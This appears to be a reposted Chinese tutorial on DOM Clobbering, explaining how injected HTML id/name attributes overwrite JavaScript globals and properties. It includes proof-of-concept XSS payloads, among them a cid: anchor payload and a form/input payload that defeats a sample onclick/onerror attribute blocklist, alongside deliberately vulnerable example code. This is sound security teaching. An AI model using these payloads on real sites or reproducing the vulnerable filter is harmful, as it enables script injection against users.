DOM Clobbering详解

DOM Clobbering详解
2020-03-12 10:56:01 Author: xz.aliyun.com(查看原文) 阅读量:344 收藏

什么是DOM Crobbering?

简单定义

DOM Clobbering就是通过在页面中插入HTML代码，改变javascript中全局变量或者对象属性的含义，从而永久改变javascript执行结果的一种技术。其中的“clobbering”就是指我们破坏了原本的全局变量或对象属性。

根本原理

在一个HTML标签中设置了id属性后，可以在javascript里面直接通过id值访问。

<input id=x>
<script>alert(x); //output: [object HTMLInputElement]</script>

如果javascript脚本中本身就已经存在一个全局变量或对象属性x，那么该x的含义就会遭到破坏。

利用前提

被攻击页面允许用户插入HTML代码；
页面的javascript脚本使用了类似a.b.c层级结构的全局变量或对象属性引用来修改页面DOM。

根据我们开头给出的简单定义，页面脚本中层级结构的全局变量或对象属性引用会被用户插入的HTML代码破坏，赋予新的含义，从而改变脚本执行结果。

所以问题就在于，如何在插入的HTML代码中构造出同样的a.b.c的引用结构，从而破坏其原始含义。

多层引用结构的构造

之所以能构造出层级结构，是因为HTML集合(HTMLCollection)的存在。HTMLCollection对象类似于一个包含多个HTML元素的数组，在索引HTMLCollection对象中的元素时，可以得到a.b这样的结构。

二层结构

在HTML中，如果多个标签的id值相同，浏览器会自动形成一个HTML集合，可以通过数字索引或者name值访问集合中的元素。

<input id=idValue name=x>
<a href="//clobbering" id=idValue name=n>dom clobbering</a>
<script>
    alert(idValue);         //output: [object HTMLCollection]
    alert(idValue.x);       //output: [object HTMLInputElement]
    alert(idValue[1]);      //output: http://clobbering/
    alert(idValue.aName);   //output: http://clobbering/
</script>

注意到，使用id值对锚标签进行访问时，返回的是href属性值。因此可以构造两个相同id值的标签，其中第二个是锚标签，将想要插入的值放在锚标签的href属性中。这时就可以破坏目标页面中名为idValue.aName的二层引用了。

三层及以上结构

利用iframe和srcdoc可以构造更高层级的结构。因为如果指定了一个iframe的name值为nameValue，其contentWindow就会直接赋给nameValue这个全局变量。利用该原理，可以嵌套多层iframe，实现多层引用结构的构造。（注：可以继续嵌套，但是要对引号进行编码。）

<iframe name=a srcdoc="
<iframe name=b srcdoc='<a id=c name=d href=cid:Clobbered>test</a>'>"></iframe>
<script>setTimeout(()=>alert(a.b.c),500); //output: cid:Clobbered</script>

<iframe name=a srcdoc="
<iframe name=b srcdoc='<a id=c><a id=c name=d href=cid:Clobbered>test</a>'>"></iframe>
<script>setTimeout(()=>alert(a.b.c.d),500); //output: cid:Clobbered</script>

注意以上代码使用了setTimeout函数引发延时，因为iframe的渲染需要时间。

带限制的层级结构

在上面的例子中，所有HTML集合的最后一个元素都是锚标签，这是因为在用idValue或者nameValue引用标签时，只有锚标签会直接返回href值（可以被设置为任意内容），而不是一个说明元素类型的字符串。

如果不使用锚标签，idValue.attributeName的形式也可以引用在属性中设置的任意内容。

<div id=idValue align=clobbering>
<script>
    alert(idValue.align);   //output: clobbering
</script>

不同的id值组合形成HTMLCollection

在HTML中，表单与表单控件，表单与图像标签间都可以形成HTML集合，不管id值是什么，这种情况下，可以用idValue1.idValue2.attributeName的形式进行引用。

<form id=idValue1 name=m>
<input id=idValue2 value="clobbering">
<script>
alert(idValue1)；                //output: [object HTMLFormElement]
alert(idValue1.idValue2.value)； //output: clobbering
</script>

这种带限制的层级结构的意思是，该方式构造的多层引用a.b.c，最末值c是HTML规范中定义的属性名中的一个，因为只有已定义的属性名才会有对应的DOM属性，所以不能使用自己定义的属性名。

利用实例

二层结构破坏脚本中的对象引用

<html>
<body>
    <a id=name1><a href='cid:"onerror=alert(1)//' id=name1 name=name2> <!-- 攻击者插入 --></body>
</html>

<script>
    let outdiv = document.createElement("div");
    let image = '<img src="' + (name1.name2 ? name1.name2 : "http://www.baidu.com") + '">';
    outdiv.innerHTML = image;
    document.body.appentChild(outdiv);
</script>

原始脚本中引用了name1.name2，这里只是一个简单的说明，现实中的例子肯定更加复杂，不可能随便引用一个没见过的对象名。因此我们使用锚标签构造了一个HTML集合，使用idValue.nameValue的形式，在href属性中添加触发XSS的代码。

由于目标页面的代码结构，需要使用双引号，因此在这里使用cid协议，该协议不会对双引号进行编码，否则无法触发XSS。

破坏脚本中的属性(property)引用

<html>
<body>
    <!-- 表单，用于提交payload -->
    <form action="" id="form1">
    <input type="text" name="payload" style="width: 500px;height:60px;"><br>
    <input type="button" onclick=formSubmit() value="submit">
    </form>
</body>
</html>
<script>
// 遍历DOM树，不需要关注这个函数
function DomBFS(element, callback) {
    var queue = []; 
    while(element) {
        callback(element);
        if(element.children.length !== 0) {
            for (var i = 0; i < element.children.length; i++) {
                queue.push(element.children[i]);
            }
        }
        element = queue.shift(); 
    }
}

// 过滤用户提交的HTML代码，如果包含onclick, onerror，删掉该属性(attribute)
let blockAttributes = ["onclick", "onerror"];
function formSubmit() {
    let f = document.getElementById("form1");
    let sandbox = document.implementation.createHTMLDocument('');
    let root = sandbox.createElement("div");
    root.innerHTML = f.payload.value;

    DomBFS(root, function(element){
        // 遍历属性名
        for(var a = 0; a < element.attributes.length; a+=1) {
            let attr = element.attributes[a];
            if(blockAttributes.indexOf(attr.name) != -1) {
                element.removeAttribute(attr.name);
                a -= 1;
            }
        }
    })
    document.body.appendChild(root);
}
</script>

payload

<form onclick=alert(1)><input id=attributes>Click me

运行结果

对比：

分析

目标页面在对标签属性(attribute)进行过滤时，调用了element.attributes.length，在我们的payload中，设置了一个id值为attributes的input标签，因此破坏了过滤代码中的attributes的含义。

为了便于理解，在遍历DOM树时输出一些信息：

DomBFS(root, function(element){
        console.log("element: " + element);
        console.log("attributes: " + element.attributes);
        console.log("length: " + element.attributes.length);
        for(var a = 0; a < element.attributes.length; a+=1) {
            let attr = element.attributes[a];
            console.log("attribute: " + attr.name);
            if(blockAttributes.indexOf(attr.name) != -1) {
                element.removeAttribute(attr.name);
                a -= 1;
            }
        }
        console.log("\n");
    })

输入为paylaod时，输出信息为下：

可以看到在遍历到payload中的form标签时，element.attributes引用的不是form标签中属性，而是payload中的input标签，这时因为payload中的form和input构成了一个HTML集合。而input标签的length属性并未被定义，所以返回undefined，无法进入循环，因此直接跳过了form标签，开始遍历下一个元素。

参考资料

文章来源: http://xz.aliyun.com/t/7346
如有侵权请联系:admin#unsafe.sh